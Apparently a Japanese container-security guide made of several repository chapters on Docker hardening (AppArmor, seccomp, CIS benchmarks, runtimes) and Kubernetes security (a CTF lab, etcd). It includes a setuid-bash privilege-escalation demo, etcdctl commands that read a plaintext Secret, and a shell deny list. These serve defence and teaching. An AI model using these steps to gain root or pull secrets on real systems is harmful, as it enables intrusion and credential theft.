A /var/cache/nginx/fastcgi_temp
C /etc
C /etc/nginx
C /etc/nginx/conf.d
C /etc/nginx/conf.d/default.conf
```

ただし、これは **変更があったファイル** を表示するだけなので `open` や `read` されたファイルは取得することができません。  
そのため、それらのファイル一覧を取得するには eBPF などを用いてイベントトレースするなどの方法があります。  

例えば [opensnoop.py][1] 相当の機能を持たせた上で、コンテナのイベントのみ表示するようにすると、次のように開いたファイル一覧を取得することができます。

```sh
$ sudo ./cxray
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"bash","fname":"/","pid":"1800","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:40+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/etc/ld.so.cache","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/lib/x86_64-linux-gnu/libc.so.6","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/etc/passwd","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
```

## AppArmor プロファイルを簡単に生成する

AppArmor プロファイルのシンタックスが難解なため、意図しない設定をしてしまうことがあります。  
そこで [genuinetolls/bane][2] というツールを紹介します。

これは TOML ファイルに禁止するコマンドやファイルパスを記述するだけで AppArmor プロファイルを生成するツールです。

例えば次のような TOML ファイルを用意します。

```toml
Name = "sample"

[Filesystem]
# read only paths for the container
ReadOnlyPaths = [
	"/bin/**",
	"/boot/**",
	"/dev/**",
	"/etc/**",
	"/home/**",
	"/lib/**",
	"/lib64/**",
	"/media/**",
	"/mnt/**",
	"/opt/**",
	"/proc/**",
	"/root/**",
	"/sbin/**",
	"/srv/**",
	"/tmp/**",
	"/sys/**",
	"/usr/**",
]

# paths where you want to log on write
LogOnWritePaths = [
	"/**"
]

# paths where you can write
WritablePaths = [
	"/var/run/nginx.pid"
]

# allowed executable files for the container
AllowExec = [
	"/usr/sbin/nginx"
]

# denied executable files
DenyExec = [
	"/bin/dash",
	"/bin/sh",
	"/usr/bin/top"
]
```

`bane` を使用すると AppArmor プロファイルを生成し、 `apparmor_parser` を実行してくれます。

```sh
ubuntu@bpf:~$ sudo ./bane sample.toml
Profile installed successfully you can now run the profile with
`docker run --security-opt="apparmor:docker-sample"`
ubuntu@bpf:~$ docker run --rm -it --security-opt="apparmor:docker-sample" nginx:latest bash
root@03b91bd97550:/# /bin/dash
bash: /bin/dash: Permission denied
root@03b91bd97550:/# sh
bash: /bin/sh: Permission denied
```

また、`docker-slim` を使って生成することも可能です。`docker-slim` のインストールは [ドキュメント][3] を参照してください。  

`docker-slim build` を実行し適当にコンテナの中でコマンドを実行します。今回は HTTP ポートを Expose しないため `--http-probe=false` を与えています。

```sh
ubuntu@vm:~/$ ./docker-slim build ubuntu:latest --http-probe=false
docker-slim: message='join the Gitter channel to ask questions or to share your feedback' info='https://gitter.im/docker-slim/community'
docker-slim: message='join the Discord server to ask questions or to share your feedback' info='https://discord.gg/9tDyxYS'
docker-slim[build]: info=probe message='changing continue-after from probe to enter because http-probe is disabled'
docker-slim[build]: state=started
docker-slim[build]: info=params target=ubuntu:latest continue.mode=enter rt.as.user=true keep.perms=true
docker-slim[build]: state=image.inspection.start
docker-slim[build]: info=image id=sha256:9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b size.bytes=72875723 size.human=73 MB
docker-slim[build]: info=image.stack index=0 name='ubuntu:latest' id='sha256:9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b'
docker-slim[build]: state=image.inspection.done
docker-slim[build]: state=container.inspection.start
docker-slim[build]: info=container status=created name=dockerslimk_6887_20201115065250 id=efa234652587e1367e9572b72abf534eb4e8190c603c5a46e77177a0a78094bd
docker-slim[build]: info=cmd.startmonitor status=sent
docker-slim[build]: info=event.startmonitor.done status=received
docker-slim[build]: info=container name=dockerslimk_6887_20201115065250 id=efa234652587e1367e9572b72abf534eb4e8190c603c5a46e77177a0a78094bd target.port.list=[] target.port.info=[] message='YOU CAN USE THESE PORTS TO INTERACT WITH THE CONTAINER'
docker-slim[build]: info=continue.after mode=enter message='provide the expected input to allow the container inspector to continue its execution'
docker-slim[build]: info=prompt message='USER INPUT REQUIRED, PRESS <ENTER> WHEN YOU ARE DONE USING THE CONTAINER'

docker-slim[build]: state=container.inspection.finishing
docker-slim[build]: state=container.inspection.artifact.processing
docker-slim[build]: state=container.inspection.done
docker-slim[build]: state=building message='building optimized image'
docker-slim[build]: state=completed
docker-slim[build]: info=results status='MINIFIED BY 9.95X [72875723 (73 MB) => 7322511 (7.3 MB)]'
docker-slim[build]: info=results  image.name=ubuntu.slim image.size='7.3 MB' data=true
docker-slim[build]: info=results  artifacts.location='/home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts'
docker-slim[build]: info=results  artifacts.report=creport.json
docker-slim[build]: info=results  artifacts.dockerfile.original=Dockerfile.fat
docker-slim[build]: info=results  artifacts.dockerfile.new=Dockerfile
docker-slim[build]: info=results  artifacts.seccomp=ubuntu-seccomp.json
docker-slim[build]: info=results  artifacts.apparmor=ubuntu-apparmor-profile
docker-slim[build]: state=done
docker-slim[build]: info=report file='slim.report.json'
docker-slim: message='join the Gitter channel to ask questions or to share your feedback' info='https://gitter.im/docker-slim/community'
docker-slim: message='join the Discord server to ask questions or to share your feedback' info='https://discord.gg/9tDyxYS'
```

実行を終了すると、上記メッセージにあるように `/home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts/ubuntu-apparmor-profile` に AppArmor プロファイルが生成されます。  

このようにツールの手助けを借りると簡単にプロファイルを生成することができます。

[1]: https://github.com/iovisor/bcc/blob/master/tools/opensnoop.py "https://github.com/iovisor/bcc/blob/master/tools/opensnoop.py"
[2]: https://github.com/genuinetools/bane "https://github.com/genuinetools/bane"
[3]: https://github.com/docker-slim/docker-slim#installation "https://github.com/docker-slim/docker-slim#installation"


================================================
FILE: source/hardening/cis-benchmark.md
================================================
# CIS Benchmarks に準拠して Docker をセキュアにする

CIS Benchmarks[^1] は CIS (Center For Internet Security) というインターネット・セキュリティの標準化に取り組んでいる団体が発行しているベストプラクティスのガイドラインです。  
CIS Benchmarks の対象には OS の他に Apache などのミドルウェアがあり、Docker も含まれています。[^2]

CIS Benchmarks の特徴として、項目の検査内容や対応が明確なため、ツールとして落とし込みやすいことです。既に docker-bench-security[^3] など、ツール化されているものがあるため、気軽に試すことができます。

## docker-bench-security で CIS Benchmark に準拠する

docker-bench-security は CIS Docker Benchmark に準拠しているかを確認するツールです。  
大きく分けて次の7点をチェックします。

1. Host Configuration ... Docker daemon を実行しているホストの構成
2. Docker daemon configuration ... Docker daemon の設定
3. Docker daemon configuration files ... Docker daemon が利用するファイルのパーミッションなどの構成
4. Container Images and Build File ... ビルド済みイメージのセキュリティ
5. Container Runtimes ... コンテナランタイム
6. Docker Security Operations ... コンテナ運用におけるベストプラクティス
7. Docker Swarm Configuration ... Docker Swarm mode の設定

実行方法は次のようなコマンドで、コンテナとして動かすことができます。

```sh
ubuntu@sandbox:~$ docker run -it --net host --pid host --userns host --cap-add audit_control \
     -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
     -v /etc:/etc:ro \
     -v /usr/bin/containerd:/usr/bin/containerd:ro \
     -v /usr/bin/runc:/usr/bin/runc:ro \
     -v /usr/lib/systemd:/usr/lib/systemd:ro \
     -v /var/lib:/var/lib:ro \
     -v /var/run/docker.sock:/var/run/docker.sock:ro \
     --label docker_bench_security \
     docker/docker-bench-security
```

するとレポートが出力されます。問題がなければ「PASS」と表示されますが、準拠していない場合は「WARN」と出力されます。

```
[INFO] 1 - Host Configuration
[WARN] 1.1  - Ensure a separate partition for containers has been created
[NOTE] 1.2  - Ensure the container host has been Hardened
[INFO] 1.3  - Ensure Docker is up to date
[INFO]      * Using 19.03.13, verify is it up to date as deemed necessary
[INFO]      * Your operating system vendor may provide support and security maintenance for Docker
[INFO] 1.4  - Ensure only trusted users are allowed to control Docker daemon
[INFO]      * docker:x:999:ubuntu
[WARN] 1.5  - Ensure auditing is configured for the Docker daemon
[WARN] 1.6  - Ensure auditing is configured for Docker files and directories - /var/lib/docker
[WARN] 1.7  - Ensure auditing is configured for Docker files and directories - /etc/docker
...
```

例えば `1.5 Ensure auditing is configured for the Docker daemon` に対応するとしましょう。  
CIS Benchmark を確認すると、これは Docker daemon に対して audit が有効になっていないことを指摘しています。rootless Docker でない場合、Docker daemon は root 権限で動作するため、audit 対象としてセキュリティログを集めておくのがよいでしょう。

CIS Benchmark の Remediation 項目を確認すると auditd のルールに `-w /usr/bin/dockerd -k docker` を追加するという対応方法が記載されています。  
それに乗っ取り、対応を行い、Audit の項目のコマンドを実行して確認します。

```
ubuntu@sandbox:~$ sudo auditctl -l | grep /usr/bin/dockerd
-w /usr/bin/dockerd -p rwxa -k docker
```

これで問題ないようです。再度 docker-bench-security を実行すると `[PASS]` になることが確認できます。

## イメージをセキュアにする

Docker イメージをセキュアにするには、[Docker イメージのセキュリティ](../security/image/README.md)で紹介した「機密情報を含ませない」「脆弱性のあるパッケージをアップデートする」以外にも、いくつか気をつけるべき点があります。  
これも CIS Benchmark に「4. Container Images and Build File Configuration」として基準が示されており、docker-security-bench でスキャンすることが可能です。  
しかしながら docker-security-bench ではスコアとして計上されない Not Scored な項目がいくつか実装されていません。例えば次のような項目です。

* 機密情報を Dockerfile に含めない
* setuid / setgid されたバイナリの削除

また、CIS Benchmark で示されている基準以外にも `latest` タグを避ける、`sudo` コマンドを使用しないなどの観点もあります。  
これらを検出するために goodwithtech/dockle[^4] というツールがあるので、紹介します。

例えば `nginx:latest` イメージに対して実行すると次のような結果を得ます。

```
$ dockle nginx:latest
ubuntu@sandbox:~$ dockle nginx:latest
WARN    - CIS-DI-0001: Create a user for the container
        * Last user should not be root
WARN    - DKL-DI-0006: Avoid latest tag
        * Avoid 'latest' tag
INFO    - CIS-DI-0005: Enable Content trust for Docker
        * export DOCKER_CONTENT_TRUST=1 before docker pull/build
INFO    - CIS-DI-0006: Add HEALTHCHECK instruction to the container image
        * not found HEALTHCHECK statement
INFO    - CIS-DI-0008: Confirm safety of setuid/setgid files
        * setuid file: bin/mount urwxr-xr-x
        * setuid file: usr/bin/gpasswd urwxr-xr-x
        * setgid file: usr/bin/expiry grwxr-xr-x
        * setuid file: bin/su urwxr-xr-x
        * setgid file: usr/bin/wall grwxr-xr-x
        * setuid file: usr/bin/chfn urwxr-xr-x
        * setuid file: usr/bin/newgrp urwxr-xr-x
        * setuid file: usr/bin/chsh urwxr-xr-x
        * setuid file: bin/umount urwxr-xr-x
        * setgid file: sbin/unix_chkpwd grwxr-xr-x
        * setgid file: usr/bin/chage grwxr-xr-x
        * setuid file: usr/bin/passwd urwxr-xr-x
```

結果からは root ユーザーが使用されていたり、setuid されたバイナリが複数あることを確認できます。  

---

[^1]: https://www.cisecurity.org/cis-benchmarks/
[^2]: https://www.cisecurity.org/benchmark/docker/
[^3]: https://github.com/docker/docker-bench-security
[^4]: https://github.com/goodwithtech/dockle


================================================
FILE: source/hardening/monitoring.md
================================================
# コンテナの監視

TBD


================================================
FILE: source/hardening/no-new-privileges.md
================================================
# No New Privileges

Linux カーネルには No New Privileges[^1] と呼ばれる、子プロセスが新しい特権を取得できないようにする仕組みがあります。

setuid されたバイナリがコンテナの中にある場合、権限昇格につながる可能性がありますが、docker では `security-opt=no-new-privileges:true` というフラグを付与することで、これを防止できます。

次のように setuid された `mybash` を用意します。

```shell
$ cat Dockerfile
FROM ubuntu:18.04
RUN cp /bin/bash /bin/mybash && chmod +s /bin/mybash
RUN useradd -ms /bin/bash newuser
USER newuser
CMD ["/bin/bash"]
```

`no-new-privileges:false` の場合は `euid=0` で root 権限になっていることが確認できます。

```shell
$ docker run --security-opt=no-new-privileges:false -it --rm test:latest
newuser@3ee2685cd961:/$ id
uid=1000(newuser) gid=1000(newuser) groups=1000(newuser)
newuser@3ee2685cd961:/$ /bin/mybash -p
mybash-4.4# id
uid=1000(newuser) gid=1000(newuser) euid=0(root) egid=0(root) groups=0(root)
```

ここで `no-new-privileges:true` とすると新しいプロセスは特権を取得できないため、setuid されていても `euid=0` になることはありません。

```shell
$ docker run --security-opt=no-new-privileges:true -it --rm test:latest
newuser@80f241191a07:/$ /bin/mybash -p
newuser@80f241191a07:/$ id
uid=1000(newuser) gid=1000(newuser) groups=1000(newuser)
```

[^1]: https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html "https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html"


================================================
FILE: source/hardening/runtime.md
================================================
# ランタイムセキュリティ

コンテナのセキュリティはホストとの Isolation に依存します。もしランタイムやカーネルに脆弱性があった場合、コンテナからホスト側に Breakeout できる要因になってしまいます。  

そこで、ランタイムを別のもの切り替えることでより強固にできるケースがあります。Docker はデフォルトで OCI ランタイムに runc を、CRI ランタイムに containerd を利用しますが、これらを gVisor や kata-containers などに切り替えることができます。

## gVisor

gVisor[^1] はコンテナのためのアプリケーションカーネルで、コンテナで発行されるシステムコールをトレースします。トレースされたシステムコールは gVisor によってフィルタ&置換されて実行されます。つまり、ホストカーネルのように振る舞うことで、ホストへの影響を小さくすることができています。  

一方で、gVisor が対応していないシステムコールは発行することができないため、例えば tcpdump などを実行することが 2020/11/15 現在できません。  
また、システムコールをトレースするということは、それだけオーバーヘッドが生じます。

## kata-containers

kata-containers[^2] はコンテナを VM のような分離レベルで動かすランタイムです。コンテナは QEMU / KVM / Firecraker 上で動作し、ホストとカーネルを共有しないため、非常に強固と言えます。  
このような Virtualized Containers への攻撃手法については black hat USA 2020 - Escaping Virtualized Containers[^3] に詳しく書かれています。

## Unikernel

TBD

---

[^1]: https://gvisor.dev/
[^2]: https://katacontainers.io/
[^3]: https://i.blackhat.com/USA-20/Thursday/us-20-Avrahami-Escaping-Virtualized-Containers.pdf


================================================
FILE: source/hardening/seccomp.md
================================================
# seccomp

AppArmor と同様に seccomp プロファイルもコンテナ上で動作するアプリケーションのイベントをトレースしなければ生成することが困難です。  
発行されているシステムコールをトレースするには `strace` や eBPF が利用できますが、ここでも `docker-slim` を活用することができます。  

AppArmor のときと同様に実行すると `home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9bb278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts/ubuntu-seccomp.json` に seccomp プロファイルが生成されます。

生成された seccomp プロファイルを見ると、許可されるシステムコールが明示的に記述されていることが確認できます。

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": [
    "SCMP_ARCH_X86_64"
  ],
  "syscalls": [
    {
      "names": [
        "getgid",
        "read",
        "setuid",
        "dup3",
        "getppid",
        ...
      ],
      "action": "SCMP_ACT_ALLOW",
      "includes": {},
      "excludes": {}
    }
  ]
}
```


================================================
FILE: source/introduction.md
================================================
# 1. コンテナの基礎技術

Linux コンテナはホストと分離するために様々な Linux カーネルの仕組みを利用しています。  
攻撃が生じる特定の領域に複数の保護レイヤを導入し、各レイヤは同種の攻撃に対して脆弱にならないような多層防御の仕組みが取られています。  
本章ではその保護の仕組みについて取り上げます。

## [Namespace](./namespace/README.md)

Linux コンテナのリソース分離技術の要である Namespace について簡単に紹介します。

## [chroot と pivot_root](./namespace/chroot-and-pivot_root.md)

コンテナのファイルシステムを分離するために必要な2つの仕組み `chroot` と `pivot_root` について紹介します。  
また、chroot の問題点についても取り上げます。

## [Capability](./capability/README.md)

Linux において権限を柔軟に付与できる仕組みである Capability について紹介します。

## [seccomp](./seccomp/README.md)

呼び出されるシステムコールの制限を行う seccomp について紹介します。

## [AppArmor](./lsm/apparmor.md)

ubuntu / debian などで、コンテナの保護機能の一つとして利用されている Linux Security Module である AppArmor について紹介します。

## [cgroup](./cgroup/README.md)

プロセスのリソース使用量を制限する仕組みである cgroup について紹介します。

# 2. コンテナのセキュリティと攻撃例

Linux コンテナの攻撃方法やそのセキュリティについて取り上げます。

## [Breakout Container](./security/breakout-to-host.md)

コンテナからホストに脱出することは Breakout / Jailbreak / Escape と呼ばれます。Privileged コンテナなど、過剰な権限を与えた場合にホスト側に Breakout できてしまうことを攻撃例を交えて紹介します。

## [Sensitive file mount](./security/sensitive-file-mount.md)

特定のファイルをマウントした場合にホスト側に Breakout できる攻撃例を紹介します。

## [DoS](./security/DoS.md)

コンテナからホスト側に対する DoS 攻撃例を紹介します。

## [コンテナ実行権限を持つグループへユーザー追加することについて](./security/adding-a-user-to-group.md)

Docker や LXD を操作するために一般ユーザーをそれぞれの実行権限を持つグループに追加した場合の危険性について紹介します。

## [AppArmor Bypass](./security/apparmor-bypass.md)

AppArmor のバイパス方法について紹介します。

## [seccomp Bypass](./security/seccomp-bypass.md)

seccomp のバイパス方法について紹介します。

## [イメージレイヤへの機密情報の保存](./security/image/secrets-in-layer.md)

イメージビルド時に機密情報をイメージに含めると、生成されたイメージから抽出することができるケースがあります。  
イメージレイヤの仕組みと具体例について紹介します。

## [イメージスキャナ](./security/image/scanner.md)

Docker イメージに含まれるソフトウェアの脆弱性を検出するイメージスキャナと、スキャナ自体の脆弱性について紹介します。

# 3. Hardening Container

コンテナをより安全に実行するための方法について紹介します。

## [No New Privileges](hardening/no-new-privileges.md)

子プロセスが特権を獲得しないようにする No New Privileges について紹介します。

## [AppArmor](hardening/apparmor.md)

AppArmor のプロファイルの自動生成などについて紹介します。

## [seccomp](hardening/seccomp.md)

seccomp のプロファイルの自動生成などについて紹介します。

## [runtime](hardening/runtime.md)

ランタイムやカーネルの脆弱性からホストを守るために containerd / runc 以外の CRI / OCI ランタイムについて紹介します。

## [monitoring](hardening/monitoring.md)

TBD

## [CIS Benchmark](hardening/cis-benchmark.md)

CIS Benchmark の紹介とツールを使った確認方法について紹介します。


================================================
FILE: source/kubernetes/hardening/README.md
================================================
TBD


================================================
FILE: source/kubernetes/hardening/secret-management.md
================================================
TBD


================================================
FILE: source/kubernetes/security/README.md
================================================
# Kubernetes Security

本章ではコンテナのオーケストレーションツールである Kubernetes への攻撃例とその対策を紹介します。

![Kubernetes クラスタにおける攻撃ベクターの例](./img/kubernetes-attack-vector.png)

この図は Kubernetes クラスタにおける攻撃ベクターを示しています。Kubernetes のコンポーネントもそうですが、Kubernetes クラスタでは CI / CD ツールやダッシュボードなども密に連携するものも多く、アクセスされるとクラスタの管理者権限を取得される可能性があるため、それらのアプリケーションへの認証認可も適切に設定する必要があります。  
Kubernetes では多数のコンポーネントが存在しており、ここに記載している以外の攻撃経路も当然あるため、クラスタに対する Attack Surface を知ることが重要です。

その理解を助けるために Microsoft が作成している ATT&CK ライクな Kubernetes attack matrix が参考になります。[^1]

![Kubernetes Attack Matrix from Microsoft](https://www.microsoft.com/security/blog/wp-content/uploads/2020/04/k8s-matrix.png)

本章でここに記載されているすべての攻撃経路を紹介はできませんが、Kubernetes クラスタの設定ミスやコンテナが侵害された場合に焦点を当て、攻撃例とその対策を紹介します。

---

[^1]: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/


================================================
FILE: source/kubernetes/security/ctf.md
================================================
# CTF を通して学ぶ Kubernetes セキュリティ

ここまでで Linux コンテナと Kubernetes のセキュリティを学んできました。ここからは CTF(Capture The Flag) 形式のゲームを通してより実践的に学んでみましょう。  

## kubectf の概要

CTF とは与えられた問題を解き、特定のフォーマットを持つ文字列を探し当てるゲームです。[^1]  
今回は演習のために [kubectf](https://github.com/mrtc0/kubectf) を用意しました。  
kubectf は minikube で演習クラスタを手元の環境で作成します。namespace ごとに問題を用意しており、Kubernetes ノードあるいは同一 namespace のリソースのどこかに存在する Flag を見つけ出します。  
kubectf では、ある Pod に侵入できたケースを想定し、 `victim` と名前がついたコンテナから問題に取り組みます。  
ですので、クラスタ管理者として Pod 外から manifest を変更したり、ノードに SSH してはいけません。あくまで攻撃者として脆弱な Pod に侵入し、そこから実行できる権限の範囲で取り組んでください。

例えば次のように `treasure-hunt` という問題では `treasure-hunt` namespace に切り替え、 `victim` と名前がついた Pod に入り、その中で問題に取り組みます。

```shell
❯ kubens treasure-hunt

❯ kubectl get pods
NAME                              READY   STATUS    RESTARTS   AGE
docker-registry-6b5b55b44-zgvxf   1/1     Running   0          42m
victim-68bcd4465f-q4pkb           1/1     Running   0          42m

# victim コンテナの中から問題に取り組む
❯ kubectl exec -it victim-68bcd4465f-q4pkb sh
/ #
```

## kubectf のセットアップ

kubectf のセットアップに際し、以下のソフトウェアが必要です。

* minikube
* kubectl
* Docker Engine

これらのソフトウェアのインストールはそれぞれのマニュアルをご参照ください。[^2]

インストールが終わったら kubectf のリポジトリを clone し、インストールスクリプトを実行します。

```shell
$ git@git.pepabo.com:mrtc0/kubectf.git
$ cd kubectf && ./setup.sh
```

インストールスクリプトの実行が終わり、全ての namespace で Pod が動いていることを確認してください。

```shell
❯ kubectl get ns
NAME                    STATUS   AGE
can-you-keep-a-secret   Active   4d17h
default                 Active   4d17h
gatekeeper-system       Active   4d17h
kube-node-lease         Active   4d17h
kube-public             Active   4d17h
kube-system             Active   4d17h
mountme                 Active   4d17h
mountme2                Active   4d17h
sniff                   Active   41h
treasure-hunt           Active   4d17h

❯ kubectl get pods --all-namespace
NAMESPACE               NAME                                            READY   STATUS    RESTARTS   AGE
can-you-keep-a-secret   victim-56958dffc6-ddfhk                         1/1     Running   1          4d17h
gatekeeper-system       gatekeeper-audit-7d99d9d87d-xqsnf               1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-56f4v   1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-5qfm4   1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-b77rm   1/1     Running   3          4d17h
kube-system             coredns-f9fd979d6-8tgk8                         1/1     Running   2          4d17h
kube-system             etcd-minikube                                   1/1     Running   2          4d17h
kube-system             kube-apiserver-minikube                         1/1     Running   2          4d17h
kube-system             kube-controller-manager-minikube                1/1     Running   2          4d17h
kube-system             kube-proxy-ljjkx                                1/1     Running   2          4d17h
kube-system             kube-scheduler-minikube                         1/1     Running   2          4d17h
kube-system             storage-provisioner                             1/1     Running   5          4d17h
mountme                 victim-7c5745b4dc-t4hdw                         1/1     Running   2          4d17h
mountme2                victim-7c5745b4dc-b2cmf                         1/1     Running   2          4d17h
sniff                   client-66b6f5cdcf-v5n9j                         1/1     Running   0          15h
sniff                   server-79b88f567-v4xsp                          1/1     Running   1          42h
sniff                   victim-7f4dc947d5-b9npv                         1/1     Running   0          15h
treasure-hunt           docker-registry-6b5b55b44-2mm42                 1/1     Running   2          4d17h
treasure-hunt           victim-68bcd4465f-n7s2r                         1/1     Running   2          4d17h
```

これで準備は OK です。問題の詳細等はリポジトリの各問題のディレクトリにある README を参照してください。

---

[^1] : Jeopardy 形式で多く利用されるルールです。他の形式の CTF もあり、それぞれルールが異なります。


================================================
FILE: source/kubernetes/security/etcd.md
================================================
# etcd

Kubernetes のコントロールプレーンには、クラスタの情報を格納する KV ストアとして etcd があります。
etcd はデフォルトでは 2379/tcp で API を提供しています。

```shell
root@master1:/# ss -ntlp4 | grep etcd
LISTEN    0         4096             127.0.0.1:2379             0.0.0.0:*        users:(("etcd",pid=11583,fd=6))
LISTEN    0         4096            10.0.1.105:2379             0.0.0.0:*        users:(("etcd",pid=11583,fd=5))
LISTEN    0         4096            10.0.1.105:2380             0.0.0.0:*        users:(("etcd",pid=11583,fd=3))
```

保管する情報には Secret リソースも含まれるため、適切なアクセス制御や暗号化を施す必要があります。  
多くのクラスタ構築ツールでは外部公開せずに、TLS クライアント証明書による接続が必須になるように構成されます。

## etcd の操作

etcd は API を介して操作することができます。

```
root@master1:/# curl -s -k \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    https://127.0.0.1:2379/version | jq
{
  "etcdserver": "3.4.13",
  "etcdcluster": "3.4.0"
}
```

また、etcdctl を使って操作することもできます。etcd のバージョンによって API が異なるため、`ETCDCTL_API` 環境変数で利用するバージョンを指定する必要があります。  
キーの一覧を取得すると Kubernetes クラスタのほとんどのリソースが含まれていることがわかります。

```
root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get / --prefix --keys-only

/registry/apiextensions.k8s.io/customresourcedefinitions/bgpconfigurations.crd.projectcalico.org
/registry/apiextensions.k8s.io/customresourcedefinitions/bgppeers.crd.projectcalico.org
/registry/apiextensions.k8s.io/customresourcedefinitions/blockaffinities.crd.projectcalico.org
...
/registry/clusterrolebindings/calico-kube-controllers
/registry/clusterrolebindings/calico-node
/registry/clusterrolebindings/cephfs-csi-nodeplugin
...
/registry/clusterroles/admin
/registry/clusterroles/calico-kube-controllers
/registry/clusterroles/calico-node
...
/registry/configmaps/default/kube-root-ca.crt
/registry/configmaps/kube-node-lease/kube-root-ca.crt
/registry/configmaps/kube-public/cluster-info
...
/registry/controllerrevisions/kube-system/calico-node-f68f5dfc5
/registry/controllerrevisions/kube-system/kube-proxy-5bd89cc4b7
/registry/controllerrevisions/kube-system/nodelocaldns-84bfb6b45f
...
/registry/daemonsets/kube-system/calico-node
/registry/daemonsets/kube-system/kube-proxy
/registry/daemonsets/kube-system/nodelocaldns
...
/registry/deployments/kube-system/calico-kube-controllers
/registry/deployments/kube-system/coredns
/registry/deployments/kube-system/dns-autoscaler
...
/registry/namespaces/default
/registry/namespaces/kube-node-lease
/registry/namespaces/kube-public
...
/registry/pods/kube-system/calico-kube-controllers-7c5b64bf96-l54fz
/registry/pods/kube-system/calico-node-g7r9q
/registry/pods/kube-system/calico-node-pxzx4
...
/registry/secrets/kube-node-lease/default-token-jqg65
/registry/secrets/kube-public/default-token-rhw5q
/registry/secrets/kube-system/attachdetach-controller-token-dn6nl
...
```

値はシリアライズされたバイナリ値となっているため、可読性に乏しいですが、リソースのオブジェクトが入っていることがわかります。

```shell
root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get /registry/namespaces/kube-system -w fields
"ClusterID" : 18321220406064639639
"MemberID" : 7551142479662027965
"Revision" : 1223524
"RaftTerm" : 3
"Key" : "/registry/namespaces/kube-system"
"CreateRevision" : 4
"ModRevision" : 4
"Version" : 1
"Value" : "k8s\x00\n\x0f\n\x02v1\x12\tNamespace\x12\xb6\x01\n\x9b\x01\n\vkube-system\x12\x00\x1a\x00\"\x00*$a65a4862-cb15-4a8d-9115-35cb3dd9a6422\x008\x00B\b\b\xc9\xffو\x06\x10\x00z\x00\x8a\x01O\n\x0ekube-apiserver\x12\x06Update\x1a\x02v1\"\b\b\xc9\xffو\x06\x10\x002\bFieldsV1:\x1d\n\x1b{\"f:status\":{\"f:phase\":{}}}\x12\f\n\nkubernetes\x1a\b\n\x06Active\x1a\x00\"\x00"
"Lease" : 0
"More" : false
"Count" : 1
```

## Secret の暗号化

etcd に含まれるデータはデフォルトでは暗号化されません。そのため、etcd の API にアクセスされた場合、Secret リソースも含めた Kubernetes クラスタに含まれるクレデンシャルが漏洩する可能性があります。

```shell
❯ kubectl create secret generic password --from-literal=pass='p@ssw0rd'
secret/password created

root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get /registry/secrets/default/password -w fields
"ClusterID" : 18321220406064639639
"MemberID" : 7551142479662027965
"Revision" : 1228694
"RaftTerm" : 3
"Key" : "/registry/secrets/default/password"
"CreateRevision" : 1228577
"ModRevision" : 1228577
"Version" : 1
# `p@ssw0rd` が含まれている
"Value" : "k8s\x00\n\f\n\x02v1\x12\x06Secret\x12\xcc\x01\n\xaf\x01\n\bpassword\x12\x00\x1a\adefault\"\x00*$85ed6ed7-af50-4962-9450-29de336c26132\x008\x00B\b\b\xf9\xde\xed\x88\x06\x10\x00z\x00\x8a\x01_\n\x0ekubectl-create\x12\x06Update\x1a\x02v1\"\b\b\xf9\xde\xed\x88\x06\x10\x002\bFieldsV1:-\n+{\"f:data\":{\".\":{},\"f:pass\":{}},\"f:type\":{}}\x12\x10\n\x04pass\x12\bp@ssw0rd\x1a\x06Opaque\x1a\x00\"\x00"
"Lease" : 0
"More" : false
"Count" : 1
```

適切に暗号化を行うと、値は次のようになり、etcd の API 経由では平文は取得できなくなります。

```yaml
"Value" : "k8s:enc:aesgcm:v1:key1:ZZS(՝Uu\x1e\x81\xc0owc\x83j\x8e\x05\x8b\a(\x85\xb2\x0e\x8dd%\xc9!\xeey7\x..."
```

暗号化方式にはいくつかのパラメータが利用できますが、ローカルで管理している暗号化キーを使用する場合、EncryptionConfiguration のファイルに暗号化キーが保存されているため、ホストが侵害された場合は、復号される可能性があります。そのため、KMS のような Envelope 暗号化を利用する方式が推奨されます。

# Rerefences

